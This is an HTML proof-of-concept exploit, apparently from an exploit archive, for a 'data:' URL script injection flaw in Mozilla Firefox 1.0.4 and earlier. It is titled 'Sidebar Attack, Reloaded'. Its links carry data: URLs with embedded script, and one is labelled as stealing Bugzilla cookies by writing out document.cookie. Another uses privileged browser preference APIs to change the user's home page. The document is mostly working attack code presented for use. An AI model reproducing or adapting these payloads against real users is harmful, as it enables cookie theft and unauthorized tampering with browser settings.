|
Mozilla Firefox <= 1.0.4 "data:" URLs Remote Script Injection Exploit
// Exploit by Kohei Yoshino
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Sidebar Attack, Reloaded</title>
</head>
<body>
<p>1. <a href="#" target="_search" onclick="location.href = 'https://bugzilla.mozilla.org/';">
Click here to <strong>open this page into sidebar</strong>.</a></p>
<p>2. <a href="data:text/html,<script>document.write(document.cookie);</script>">
Click here to <strong>steal your cookies</strong> on Bugzilla.</a></p>
<p>3. Then, open about:config in content area.</p>
<p>4. <a href="data:text/html,<script>Components.classes['@mozilla.org/
preferences-service;1'].getService(Components.interfaces.nsIPrefBranch).setCharPref('
browser.startup.homepage','http://www.mozdev.org/');</script>">Click here to
<strong>change your home page to mozdev.org</strong>.</a></p>
</body>
</html>
|
| |
|
推荐
评论(0条)
